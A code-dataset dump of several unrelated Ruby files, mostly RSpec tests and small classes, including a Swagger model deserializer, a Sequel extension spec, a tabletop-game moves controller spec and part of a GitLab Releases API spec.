# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /^Array<(.*)>/i
# check to ensure the input is an array given that the the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map{ |v| _deserialize($1, v) } )
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /^(true|t|yes|y|1)$/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = BillForward.const_get(type).new
temp_model.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map{ |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 32.903704 | 191 | 0.633949 |
627241dfd5c3332b3cb856dc3d4e417f80bf7ec9 | 627 | class PublishingApiRedirectWorker < PublishingApiWorker
def perform(content_id, destination, locale, allow_draft = false)
Services.publishing_api.unpublish(
content_id,
type: "redirect",
locale: locale,
alternative_path: destination.strip,
allow_draft: allow_draft,
discard_drafts: !allow_draft,
)
rescue GdsApi::HTTPNotFound
# nothing to do here as we can't unpublish something that doesn't exist
nil
rescue GdsApi::HTTPUnprocessableEntity => e
# retrying is unlikely to fix the problem, we can send the error straight to Sentry
GovukError.notify(e)
end
end
| 33 | 87 | 0.727273 |
bfe5e7553d67c211766af79a31f40a8a6ef3094a | 859 | require_relative "spec_helper"
describe "current_datetime_timestamp extension" do
before do
@ds = Sequel.mock[:table].extension(:current_datetime_timestamp)
end
after do
Sequel.datetime_class = Time
end
it "should have current_timestamp respect Sequel.datetime_class" do
t = Sequel::Dataset.new(nil).current_datetime
t.must_be_kind_of(Time)
(Time.now - t < 0.1).must_equal true
Sequel.datetime_class = DateTime
t = Sequel::Dataset.new(nil).current_datetime
t.must_be_kind_of(DateTime)
(DateTime.now - t < (0.1/86400)).must_equal true
end
it "should have current_timestamp value be literalized as CURRENT_TIMESTAMP" do
@ds.literal(@ds.current_datetime).must_equal 'CURRENT_TIMESTAMP'
Sequel.datetime_class = DateTime
@ds.literal(@ds.current_datetime).must_equal 'CURRENT_TIMESTAMP'
end
end
| 30.678571 | 81 | 0.746217 |
91738a59a6bc4f5e44778b5ed24e670e7cd9a743 | 2,658 | ##
## Copyright (c) 2015 SONATA-NFV [, ANY ADDITIONAL AFFILIATION]
## ALL RIGHTS RESERVED.
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
## Neither the name of the SONATA-NFV [, ANY ADDITIONAL AFFILIATION]
## nor the names of its contributors may be used to endorse or promote
## products derived from this software without specific prior written
## permission.
##
## This work has been performed in the framework of the SONATA project,
## funded by the European Commission under Grant number 671517 through
## the Horizon 2020 and 5G-PPP programmes. The authors would like to
## acknowledge the contributions of their colleagues of the SONATA
## partner consortium (www.sonata-nfv.eu).
# encoding: utf-8
require 'tempfile'
require 'pp'
class NService
attr_accessor :descriptor
def initialize(catalogue, logger, folder)
@catalogue = catalogue
@url = @catalogue.url+'/network-services'
@logger = logger
@descriptor = {}
if folder
@folder = File.join(folder, "service_descriptors")
FileUtils.mkdir @folder unless File.exists? @folder
end
end
def to_file(content)
@logger.debug "NService.to_file(#{content})"
filename = content['name'].split('/')[-1]
File.open(File.join( @folder, filename), 'w') {|f| YAML.dump(content, f) }
end
def from_file(filename)
@logger.debug "NService.from_file(#{filename})"
@descriptor = YAML.load_file filename
@logger.debug "NService.from_file: content = #{@descriptor}"
@descriptor
end
def store()
@logger.debug "NService.store(#{@descriptor})"
service = duplicated_service?(@descriptor)
service = @catalogue.create(@descriptor) unless service.any?
@logger.debug "NService.store service #{service}"
service
end
def find_by_uuid(uuid)
@logger.debug "NService.find_by_uuid(#{uuid})"
service = @catalogue.find_by_uuid(uuid)
@logger.debug "NService.find_by_uuid: #{service}"
service
end
private
def duplicated_service?(descriptor)
@catalogue.find({'vendor'=>descriptor['vendor'], 'name'=>descriptor['name'], 'version'=>descriptor['version']})
end
end
| 33.225 | 115 | 0.706546 |
0359fae6450ee6ccc6d2ec975034905f30a2612a | 8,338 | # frozen_string_literal: true
require 'rails_helper'
RSpec.describe MovesController, type: :controller do
# This should return the minimal set of attributes required to create a valid
# Move. As you add validations to Move, be sure to
# adjust the attributes here as well.
let(:valid_attributes) do
{
type: 'Moves::Basic',
name: 'Act Under Pressure',
rating: 'cool',
description: 'Description'
}
end
let(:invalid_attributes) do
{
type: ''
}
end
# This should return the minimal set of values that should be in the session
# in order to pass any filters (e.g. authentication) defined in
# MovesController. Be sure to keep this updated too.
let(:valid_session) { {} }
let(:user) { create :user }
let(:body) { JSON.parse(response.body) }
before do
sign_in user
end
describe 'GET #index' do
subject(:get_index) do
get :index,
params: params,
session: valid_session,
format: format_type
end
let(:format_type) { :html }
let(:params) { {} }
it 'returns a success response' do
Move.create! valid_attributes
get_index
expect(response).to be_successful
end
context 'with json format' do
let(:format_type) { :json }
render_views
context 'sorted by type' do
let!(:rollable_move) { create :moves_rollable }
let!(:basic_move) { create :moves_basic }
it 'is sorted by type' do
get_index
expect(body.dig(0, "name")).to eq 'Act Under Pressure'
end
end
context 'when playbook_id is supplied' do
let(:playbook) { create :playbook }
let(:params) { { playbook_id: playbook.id } }
let!(:move) { create(:move, playbook: playbook) }
let!(:another_pb_move) { create :move }
it 'filters for moves associated with playbook' do
get_index
expect(body).to all(include('id' => move.id))
end
end
context 'with a hunter' do
let(:params) { { hunter_id: hunter.id } }
let(:hunter) { create :hunter }
let!(:move) { create :move }
let!(:hunter_has_move) { create :move }
before do
hunter.moves << hunter_has_move
hunter.save
end
it 'does not include moves the hunter does not have' do
get_index
expect(body.find { |json_move| json_move['id'] == move.id}).to be_nil
end
context ' when include_all_moves' do
let(:params) { { hunter_id: hunter.id, include_all_moves: 'true' } }
it 'does not include has_move' do
get_index
expect(body.find { |json_move| json_move['id'] == move.id}['has_move']).to be_falsey
end
end
context 'when hunter has the move' do
before { hunter.moves << move }
it 'display if the hunter has the move' do
get_index
expect(body.dig(0, 'has_move')).to eq true
end
end
end
end
end
describe 'GET #show' do
subject(:get_show) do
get :show, params: params, session: valid_session, format: format_type
end
let(:move) { create :move }
let(:params) { { id: move.to_param } }
context 'when json format' do
let(:format_type) { :json }
render_views
it 'returns a success response' do
get_show
expect(response).to be_successful
end
end
end
describe 'GET #roll' do
subject(:get_roll) do
get :roll, params: params, session: valid_session, format: format_type
end
let(:move) { create :move }
let(:params) { { id: move.to_param } }
let(:body) { super().with_indifferent_access }
context 'when json format' do
let(:format_type) { :json }
render_views
context 'when hunter is passed' do
let(:params) { { id: move.to_param, hunter_id: hunter.id } }
let(:hunter) { create :hunter }
it 'includes results' do
get_roll
expect(body[:results]).to be_nil
# TODO: error on unrollable move
end
context 'with a rollable move' do
let(:move) { create :moves_rollable }
it 'returns the results of rolling the move' do
get_roll
expect(body[:results]).to match(/Your total \d+ resulted in/)
end
context 'when lucky roll' do
let(:params) do
{ id: move.to_param, hunter_id: hunter.id, lucky: true }
end
let(:hunter) { create :hunter, sharp: 1 }
let(:move) { create :moves_rollable, rating: :sharp }
it 'always rolls a 12' do
get_roll
expect(body).to include(
roll: 13,
results: 'Your total 13 resulted in ten plus result'
)
end
context 'when experience is lost' do
let(:params) do
{
id: move.to_param,
hunter_id: hunter.id,
lucky: true,
lose_experience: true
}
end
it 'hunter loses the experience from failure' do
get_roll
expect(hunter.reload.experience).to eq(-1)
end
it 'hunter gets the best result' do
get_roll
expect(body).to include(
roll: 13,
results: 'Your total 13 resulted in ten plus result'
)
end
end
end
end
context 'with a basic move' do
let(:move) { create :moves_basic }
it 'returns the results of rolling the move' do
get_roll
expect(body[:results]).to match(/Your total \d+ resulted in/)
end
end
end
end
end
describe 'GET #new' do
it 'returns a success response' do
get :new, params: {}, session: valid_session
expect(response).to be_successful
end
end
describe 'GET #edit' do
it 'returns a success response' do
move = Move.create! valid_attributes
get :edit, params: { id: move.to_param }, session: valid_session
expect(response).to be_successful
end
end
describe 'POST #create' do
subject(:post_create) do
post :create, params: { move: attributes }, session: valid_session
end
context 'with valid params' do
let(:attributes) { valid_attributes }
it 'creates a new Move' do
expect { post_create }.to change(Move, :count).by(1)
end
it 'redirects to the created move' do
post_create
expect(response).to redirect_to(move_url(Move.last))
end
end
context 'with invalid params' do
let(:attributes) { invalid_attributes }
it "returns a success response (i.e. to display the 'new' template)" do
post_create
expect(response).to be_successful
end
end
end
describe 'PUT #update' do
subject(:put_update) do
put :update,
params: { id: move.to_param, move: new_attributes },
session: valid_session
end
let!(:move) { create :move }
context 'with valid params' do
let(:new_attributes) do
{
name: 'New Move Name'
}
end
it 'updates the requested move' do
put_update
expect(move.reload.name).to eq 'New Move Name'
end
it 'redirects to the move' do
put_update
expect(response).to redirect_to(move_url(move))
end
end
context 'with invalid params' do
let(:new_attributes) { invalid_attributes }
it "returns a success response (i.e. to display the 'edit' template)" do
put_update
expect(response).to be_successful
end
end
end
describe 'DELETE #destroy' do
subject(:delete_destroy) do
delete :destroy, params: { id: move.to_param }, session: valid_session
end
let!(:move) { create :move }
it 'destroys the requested move' do
expect { delete_destroy }.to change(Move, :count).by(-1)
end
it 'redirects to the moves list' do
delete_destroy
expect(response).to redirect_to(moves_url)
end
end
end
| 26.469841 | 96 | 0.573399 |
1abe89444b0c5e25a100f55aa0f9016a8cc70061 | 705 | module Haversack
class ItemCollection < Array
def initialize(data, &block)
if !block_given?
raise ArgumentError, "expected #{data} to contain only elements of class Haversack::Item" unless data.is_a?(Array) && ItemCollection.only_items?(data)
end
@size = self.size
@weight = self.weight
block_given? ? super(data, block) : super(data)
end
def size
map(&:size).sum
end
def weight
map(&:weight).sum
end
def push(obj)
raise Haversack::KnapsackContentError unless obj.is_a? Haversack::Item
super
end
def self.only_items?(data)
data.all? { |el| el.is_a? Haversack::Item }
end
end
end
| 20.735294 | 158 | 0.624113 |
03e0954e5ab3f2c05c5adee6d4689d59628ec6c3 | 45,609 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe API::Releases do
let(:project) { create(:project, :repository, :private) }
let(:maintainer) { create(:user) }
let(:reporter) { create(:user) }
let(:developer) { create(:user) }
let(:guest) { create(:user) }
let(:non_project_member) { create(:user) }
let(:commit) { create(:commit, project: project) }
before do
project.add_maintainer(maintainer)
project.add_reporter(reporter)
project.add_guest(guest)
project.add_developer(developer)
end
describe 'GET /projects/:id/releases', :use_clean_rails_redis_caching do
context 'when there are two releases' do
let!(:release_1) do
create(:release,
project: project,
tag: 'v0.1',
author: maintainer,
released_at: 2.days.ago)
end
let!(:release_2) do
create(:release,
project: project,
tag: 'v0.2',
author: maintainer,
released_at: 1.day.ago)
end
it 'returns 200 HTTP status' do
get api("/projects/#{project.id}/releases", maintainer)
expect(response).to have_gitlab_http_status(:ok)
end
it 'returns releases ordered by released_at' do
get api("/projects/#{project.id}/releases", maintainer)
expect(json_response.count).to eq(2)
expect(json_response.first['tag_name']).to eq(release_2.tag)
expect(json_response.second['tag_name']).to eq(release_1.tag)
end
it 'does not include description_html' do
get api("/projects/#{project.id}/releases", maintainer)
expect(json_response.map { |h| h['description_html'] }).to contain_exactly(nil, nil)
end
RSpec.shared_examples 'release sorting' do |order_by|
subject { get api(url, access_level), params: { sort: sort, order_by: order_by } }
context "sorting by #{order_by}" do
context 'ascending order' do
let(:sort) { 'asc' }
it 'returns the sorted releases' do
subject
expect(json_response.map { |release| release['name'] }).to eq(releases.map(&:name))
end
end
context 'descending order' do
let(:sort) { 'desc' }
it 'returns the sorted releases' do
subject
expect(json_response.map { |release| release['name'] }).to eq(releases.reverse.map(&:name))
end
end
end
end
context 'return releases in sorted order' do
before do
release_2.update_attribute(:created_at, 3.days.ago)
end
let(:url) { "/projects/#{project.id}/releases" }
let(:access_level) { maintainer }
it_behaves_like 'release sorting', 'released_at' do
let(:releases) { [release_1, release_2] }
end
it_behaves_like 'release sorting', 'created_at' do
let(:releases) { [release_2, release_1] }
end
end
it 'matches response schema' do
get api("/projects/#{project.id}/releases", maintainer)
expect(response).to match_response_schema('public_api/v4/releases')
end
it 'returns rendered helper paths' do
get api("/projects/#{project.id}/releases", maintainer)
expect(json_response.first['commit_path']).to eq("/#{release_2.project.full_path}/-/commit/#{release_2.commit.id}")
expect(json_response.first['tag_path']).to eq("/#{release_2.project.full_path}/-/tags/#{release_2.tag}")
expect(json_response.second['commit_path']).to eq("/#{release_1.project.full_path}/-/commit/#{release_1.commit.id}")
expect(json_response.second['tag_path']).to eq("/#{release_1.project.full_path}/-/tags/#{release_1.tag}")
end
context 'when include_html_description option is true' do
it 'includes description_html field' do
get api("/projects/#{project.id}/releases", maintainer), params: { include_html_description: true }
expect(json_response.map { |h| h['description_html'] })
.to contain_exactly(instance_of(String), instance_of(String))
end
end
end
it 'returns an upcoming_release status for a future release' do
tomorrow = Time.now.utc + 1.day
create(:release, project: project, tag: 'v0.1', author: maintainer, released_at: tomorrow)
get api("/projects/#{project.id}/releases", maintainer)
expect(response).to have_gitlab_http_status(:ok)
expect(json_response.first['upcoming_release']).to eq(true)
end
it 'returns an upcoming_release status for a past release' do
yesterday = Time.now.utc - 1.day
create(:release, project: project, tag: 'v0.1', author: maintainer, released_at: yesterday)
get api("/projects/#{project.id}/releases", maintainer)
expect(response).to have_gitlab_http_status(:ok)
expect(json_response.first['upcoming_release']).to eq(false)
end
it 'avoids N+1 queries', :use_sql_query_cache do
create(:release, :with_evidence, project: project, tag: 'v0.1', author: maintainer)
create(:release_link, release: project.releases.first)
control_count = ActiveRecord::QueryRecorder.new(skip_cached: false) do
get api("/projects/#{project.id}/releases", maintainer)
end.count
create_list(:release, 2, :with_evidence, project: project, tag: 'v0.1', author: maintainer)
create_list(:release, 2, project: project)
create_list(:release_link, 2, release: project.releases.first)
create_list(:release_link, 2, release: project.releases.last)
expect do
get api("/projects/#{project.id}/releases", maintainer)
end.not_to exceed_all_query_limit(control_count)
end
it 'serializes releases for the first time and read cached data from the second time' do
create_list(:release, 2, project: project)
expect(API::Entities::Release)
.to receive(:represent).with(instance_of(Release), any_args)
.twice
5.times { get api("/projects/#{project.id}/releases", maintainer) }
end
it 'increments the cache key when link is updated' do
releases = create_list(:release, 2, project: project)
expect(API::Entities::Release)
.to receive(:represent).with(instance_of(Release), any_args)
.exactly(4).times
2.times { get api("/projects/#{project.id}/releases", maintainer) }
releases.each { |release| create(:release_link, release: release) }
3.times { get api("/projects/#{project.id}/releases", maintainer) }
end
it 'increments the cache key when evidence is updated' do
releases = create_list(:release, 2, project: project)
expect(API::Entities::Release)
.to receive(:represent).with(instance_of(Release), any_args)
.exactly(4).times
2.times { get api("/projects/#{project.id}/releases", maintainer) }
releases.each { |release| create(:evidence, release: release) }
3.times { get api("/projects/#{project.id}/releases", maintainer) }
end
context 'when tag does not exist in git repository' do
let!(:release) { create(:release, project: project, tag: 'v1.1.5') }
it 'returns the tag' do
get api("/projects/#{project.id}/releases", maintainer)
expect(json_response.count).to eq(1)
expect(json_response.first['tag_name']).to eq('v1.1.5')
expect(release).to be_tag_missing
end
end
context 'when tag contains a slash' do
let!(:release) { create(:release, project: project, tag: 'debian/2.4.0-1', description: "debian/2.4.0-1") }
it 'returns 200 HTTP status' do
get api("/projects/#{project.id}/releases", maintainer)
expect(response).to have_gitlab_http_status(:ok)
end
end
context 'when user is a guest' do
let!(:release) do
create(:release,
project: project,
tag: 'v0.1',
author: maintainer,
created_at: 2.days.ago)
end
it 'responds 200 OK' do
get api("/projects/#{project.id}/releases", guest)
expect(response).to have_gitlab_http_status(:ok)
end
it "does not expose tag, commit, source code or helper paths" do
get api("/projects/#{project.id}/releases", guest)
expect(response).to match_response_schema('public_api/v4/release/releases_for_guest')
expect(json_response[0]['assets']['count']).to eq(release.links.count)
expect(json_response[0]['commit_path']).to be_nil
expect(json_response[0]['tag_path']).to be_nil
end
context 'when project is public' do
let(:project) { create(:project, :repository, :public) }
it 'responds 200 OK' do
get api("/projects/#{project.id}/releases", guest)
expect(response).to have_gitlab_http_status(:ok)
end
it "exposes tag, commit, source code and helper paths" do
get api("/projects/#{project.id}/releases", guest)
expect(response).to match_response_schema('public_api/v4/releases')
expect(json_response.first['assets']['count']).to eq(release.links.count + release.sources.count)
expect(json_response.first['commit_path']).to eq("/#{release.project.full_path}/-/commit/#{release.commit.id}")
expect(json_response.first['tag_path']).to eq("/#{release.project.full_path}/-/tags/#{release.tag}")
end
end
end
context 'when user is not a project member' do
it 'cannot find the project' do
get api("/projects/#{project.id}/releases", non_project_member)
expect(response).to have_gitlab_http_status(:not_found)
end
context 'when project is public' do
let(:project) { create(:project, :repository, :public) }
it 'allows the request' do
get api("/projects/#{project.id}/releases", non_project_member)
expect(response).to have_gitlab_http_status(:ok)
end
end
end
context 'when releases are public and request user is absent' do
let(:project) { create(:project, :repository, :public) }
it 'returns the releases' do
create(:release, project: project, tag: 'v0.1')
get api("/projects/#{project.id}/releases")
expect(response).to have_gitlab_http_status(:ok)
expect(json_response.count).to eq(1)
expect(json_response.first['tag_name']).to eq('v0.1')
end
end
end
describe 'GET /projects/:id/releases/:tag_name' do
context 'when there is a release' do
let!(:release) do
create(:release,
project: project,
tag: 'v0.1',
sha: commit.id,
author: maintainer,
description: 'This is v0.1')
end
it 'returns 200 HTTP status' do
get api("/projects/#{project.id}/releases/v0.1", maintainer)
expect(response).to have_gitlab_http_status(:ok)
end
it 'returns a release entry' do
get api("/projects/#{project.id}/releases/v0.1", maintainer)
expect(json_response['tag_name']).to eq(release.tag)
expect(json_response['description']).to eq('This is v0.1')
expect(json_response['author']['name']).to eq(maintainer.name)
expect(json_response['commit']['id']).to eq(commit.id)
expect(json_response['assets']['count']).to eq(4)
expect(json_response['commit_path']).to eq("/#{release.project.full_path}/-/commit/#{release.commit.id}")
expect(json_response['tag_path']).to eq("/#{release.project.full_path}/-/tags/#{release.tag}")
end
it 'matches response schema' do
get api("/projects/#{project.id}/releases/v0.1", maintainer)
expect(response).to match_response_schema('public_api/v4/release')
end
it 'contains source information as assets' do
get api("/projects/#{project.id}/releases/v0.1", maintainer)
expect(json_response['assets']['sources'].map { |h| h['format'] })
.to match_array(release.sources.map(&:format))
expect(json_response['assets']['sources'].map { |h| h['url'] })
.to match_array(release.sources.map(&:url))
end
it 'does not include description_html' do
get api("/projects/#{project.id}/releases/v0.1", maintainer)
expect(json_response['description_html']).to eq(nil)
end
context 'with evidence' do
let!(:evidence) { create(:evidence, release: release) }
it 'returns the evidence' do
get api("/projects/#{project.id}/releases/v0.1", maintainer)
expect(json_response['evidences'].count).to eq(1)
end
it '#collected_at' do
travel_to(Time.now.round) do
get api("/projects/#{project.id}/releases/v0.1", maintainer)
expect(json_response['evidences'].first['collected_at'].to_datetime.to_i).to be_within(1.minute).of(release.evidences.first.created_at.to_i)
end
end
end
context 'when release is associated to mutiple milestones' do
context 'milestones order' do
let_it_be(:project) { create(:project, :repository, :public) }
let_it_be_with_reload(:release_with_milestones) { create(:release, tag: 'v3.14', project: project) }
let(:actual_milestone_title_order) do
get api("/projects/#{project.id}/releases/#{release_with_milestones.tag}", non_project_member)
json_response['milestones'].map { |m| m['title'] }
end
before do
release_with_milestones.update!(milestones: [milestone_2, milestone_1])
end
it_behaves_like 'correct release milestone order'
end
end
context 'when release has link asset' do
let!(:link) do
create(:release_link,
release: release,
name: 'release-18.04.dmg',
url: url)
end
let(:url) { 'https://my-external-hosting.example.com/scrambled-url/app.zip' }
it 'contains link information as assets' do
get api("/projects/#{project.id}/releases/v0.1", maintainer)
expect(json_response['assets']['links'].count).to eq(1)
expect(json_response['assets']['links'].first['id']).to eq(link.id)
expect(json_response['assets']['links'].first['name'])
.to eq('release-18.04.dmg')
expect(json_response['assets']['links'].first['url'])
.to eq('https://my-external-hosting.example.com/scrambled-url/app.zip')
expect(json_response['assets']['links'].first['external'])
.to be_truthy
end
context 'when link is internal' do
let(:url) do
"#{project.web_url}/-/jobs/artifacts/v11.6.0-rc4/download?" \
"job=rspec-mysql+41%2F50"
end
it 'has external false' do
get api("/projects/#{project.id}/releases/v0.1", maintainer)
expect(json_response['assets']['links'].first['external'])
.to be_falsy
end
end
end
context 'when include_html_description option is true' do
it 'includes description_html field' do
get api("/projects/#{project.id}/releases/v0.1", maintainer), params: { include_html_description: true }
expect(json_response['description_html']).to be_instance_of(String)
end
end
context 'when user is a guest' do
it 'responds 403 Forbidden' do
get api("/projects/#{project.id}/releases/v0.1", guest)
expect(response).to have_gitlab_http_status(:forbidden)
end
context 'when project is public' do
let(:project) { create(:project, :repository, :public) }
it 'responds 200 OK' do
get api("/projects/#{project.id}/releases/v0.1", guest)
expect(response).to have_gitlab_http_status(:ok)
end
it "exposes tag and commit" do
create(:release,
project: project,
tag: 'v0.1',
author: maintainer,
created_at: 2.days.ago)
get api("/projects/#{project.id}/releases/v0.1", guest)
expect(response).to match_response_schema('public_api/v4/release')
end
end
end
end
context 'when specified tag is not found in the project' do
it 'returns 404 for maintater' do
get api("/projects/#{project.id}/releases/non_exist_tag", maintainer)
expect(response).to have_gitlab_http_status(:not_found)
expect(json_response['message']).to eq('404 Not Found')
end
it 'returns project not found for no user' do
get api("/projects/#{project.id}/releases/non_exist_tag", nil)
expect(response).to have_gitlab_http_status(:not_found)
expect(json_response['message']).to eq('404 Project Not Found')
end
it 'returns forbidden for guest' do
get api("/projects/#{project.id}/releases/non_existing_tag", guest)
expect(response).to have_gitlab_http_status(:forbidden)
end
end
context 'when user is not a project member' do
let!(:release) { create(:release, tag: 'v0.1', project: project) }
it 'cannot find the project' do
get api("/projects/#{project.id}/releases/v0.1", non_project_member)
expect(response).to have_gitlab_http_status(:not_found)
end
context 'when project is public' do
let(:project) { create(:project, :repository, :public) }
it 'allows the request' do
get api("/projects/#{project.id}/releases/v0.1", non_project_member)
expect(response).to have_gitlab_http_status(:ok)
end
context 'when release is associated to a milestone' do
let!(:release) do
create(:release, tag: 'v0.1', project: project, milestones: [milestone])
end
let(:milestone) { create(:milestone, project: project) }
it 'matches schema' do
get api("/projects/#{project.id}/releases/v0.1", non_project_member)
expect(response).to match_response_schema('public_api/v4/release')
end
it 'exposes milestones' do
get api("/projects/#{project.id}/releases/v0.1", non_project_member)
expect(json_response['milestones'].first['title']).to eq(milestone.title)
end
it 'returns issue stats for milestone' do
create_list(:issue, 2, milestone: milestone, project: project)
create_list(:issue, 3, :closed, milestone: milestone, project: project)
get api("/projects/#{project.id}/releases/v0.1", non_project_member)
issue_stats = json_response['milestones'].first["issue_stats"]
expect(issue_stats["total"]).to eq(5)
expect(issue_stats["closed"]).to eq(3)
end
context 'when project restricts visibility of issues and merge requests' do
let!(:project) { create(:project, :repository, :public, :issues_private, :merge_requests_private) }
it 'does not expose milestones' do
get api("/projects/#{project.id}/releases/v0.1", non_project_member)
expect(json_response['milestones']).to be_nil
end
end
context 'when project restricts visibility of issues' do
let!(:project) { create(:project, :repository, :public, :issues_private) }
it 'exposes milestones' do
get api("/projects/#{project.id}/releases/v0.1", non_project_member)
expect(json_response['milestones'].first['title']).to eq(milestone.title)
end
end
end
end
end
end
describe 'POST /projects/:id/releases' do
let(:params) do
{
name: 'New release',
tag_name: 'v0.1',
description: 'Super nice release',
assets: {
links: [
{
name: 'An example runbook link',
url: 'https://example.com/runbook',
link_type: 'runbook',
filepath: '/permanent/path/to/runbook'
}
]
}
}
end
before do
initialize_tags
end
it 'accepts the request' do
post api("/projects/#{project.id}/releases", maintainer), params: params
expect(response).to have_gitlab_http_status(:created)
end
it 'creates a new release' do
expect do
post api("/projects/#{project.id}/releases", maintainer), params: params
end.to change { Release.count }.by(1)
release = project.releases.last
aggregate_failures do
expect(release.name).to eq('New release')
expect(release.tag).to eq('v0.1')
expect(release.description).to eq('Super nice release')
expect(release.links.last.name).to eq('An example runbook link')
expect(release.links.last.url).to eq('https://example.com/runbook')
expect(release.links.last.link_type).to eq('runbook')
expect(release.links.last.filepath).to eq('/permanent/path/to/runbook')
end
end
it 'creates a new release without description' do
params = {
name: 'New release without description',
tag_name: 'v0.1',
released_at: '2019-03-25 10:00:00'
}
expect do
post api("/projects/#{project.id}/releases", maintainer), params: params
end.to change { Release.count }.by(1)
expect(project.releases.last.name).to eq('New release without description')
expect(project.releases.last.tag).to eq('v0.1')
expect(project.releases.last.description).to eq(nil)
end
it 'sets the released_at to the current time if the released_at parameter is not provided' do
now = Time.zone.parse('2015-08-25 06:00:00Z')
travel_to(now) do
post api("/projects/#{project.id}/releases", maintainer), params: params
expect(project.releases.last.released_at).to eq(now)
end
end
it 'sets the released_at to the value in the parameters if specified' do
params = {
name: 'New release',
tag_name: 'v0.1',
description: 'Super nice release',
released_at: '2019-03-20T10:00:00Z'
}
post api("/projects/#{project.id}/releases", maintainer), params: params
expect(project.releases.last.released_at).to eq('2019-03-20T10:00:00Z')
end
it 'assumes the utc timezone for released_at if the timezone is not provided' do
params = {
name: 'New release',
tag_name: 'v0.1',
description: 'Super nice release',
released_at: '2019-03-25 10:00:00'
}
post api("/projects/#{project.id}/releases", maintainer), params: params
expect(project.releases.last.released_at).to eq('2019-03-25T10:00:00Z')
end
it 'allows specifying a released_at with a local time zone' do
params = {
name: 'New release',
tag_name: 'v0.1',
description: 'Super nice release',
released_at: '2019-03-25T10:00:00+09:00'
}
post api("/projects/#{project.id}/releases", maintainer), params: params
expect(project.releases.last.released_at).to eq('2019-03-25T01:00:00Z')
end
it 'matches response schema' do
post api("/projects/#{project.id}/releases", maintainer), params: params
expect(response).to match_response_schema('public_api/v4/release')
end
it 'does not create a new tag' do
expect do
post api("/projects/#{project.id}/releases", maintainer), params: params
end.not_to change { Project.find_by_id(project.id).repository.tag_count }
end
context 'with protected tag' do
context 'when user has access to the protected tag' do
let!(:protected_tag) { create(:protected_tag, :developers_can_create, name: '*', project: project) }
it 'accepts the request' do
post api("/projects/#{project.id}/releases", developer), params: params
expect(response).to have_gitlab_http_status(:created)
end
end
context 'when user does not have access to the protected tag' do
let!(:protected_tag) { create(:protected_tag, :maintainers_can_create, name: '*', project: project) }
it 'forbids the request' do
post api("/projects/#{project.id}/releases", developer), params: params
expect(response).to have_gitlab_http_status(:forbidden)
end
end
end
context 'when user is a reporter' do
it 'forbids the request' do
post api("/projects/#{project.id}/releases", reporter), params: params
expect(response).to have_gitlab_http_status(:forbidden)
end
end
context 'when user is not a project member' do
it 'forbids the request' do
post api("/projects/#{project.id}/releases", non_project_member),
params: params
expect(response).to have_gitlab_http_status(:not_found)
end
context 'when project is public' do
let(:project) { create(:project, :repository, :public) }
it 'forbids the request' do
post api("/projects/#{project.id}/releases", non_project_member),
params: params
expect(response).to have_gitlab_http_status(:forbidden)
end
end
context 'when create assets altogether' do
let(:base_params) do
{
name: 'New release',
tag_name: 'v0.1',
description: 'Super nice release'
}
end
context 'when create one asset' do
let(:params) do
base_params.merge({
assets: {
links: [{ name: 'beta', url: 'https://dosuken.example.com/inspection.exe' }]
}
})
end
it 'accepts the request' do
post api("/projects/#{project.id}/releases", maintainer), params: params
expect(response).to have_gitlab_http_status(:created)
end
it 'creates an asset with specified parameters' do
post api("/projects/#{project.id}/releases", maintainer), params: params
expect(json_response['assets']['links'].count).to eq(1)
expect(json_response['assets']['links'].first['name']).to eq('beta')
expect(json_response['assets']['links'].first['url'])
.to eq('https://dosuken.example.com/inspection.exe')
end
it 'matches response schema' do
post api("/projects/#{project.id}/releases", maintainer), params: params
expect(response).to match_response_schema('public_api/v4/release')
end
end
context 'when creating two assets' do
let(:params) do
base_params.merge({
assets: {
links: [
{ name: 'alpha', url: 'https://dosuken.example.com/alpha.exe' },
{ name: 'beta', url: 'https://dosuken.example.com/beta.exe' }
]
}
})
end
it 'creates two assets with specified parameters' do
post api("/projects/#{project.id}/releases", maintainer), params: params
expect(json_response['assets']['links'].count).to eq(2)
expect(json_response['assets']['links'].map { |h| h['name'] })
.to match_array(%w[alpha beta])
expect(json_response['assets']['links'].map { |h| h['url'] })
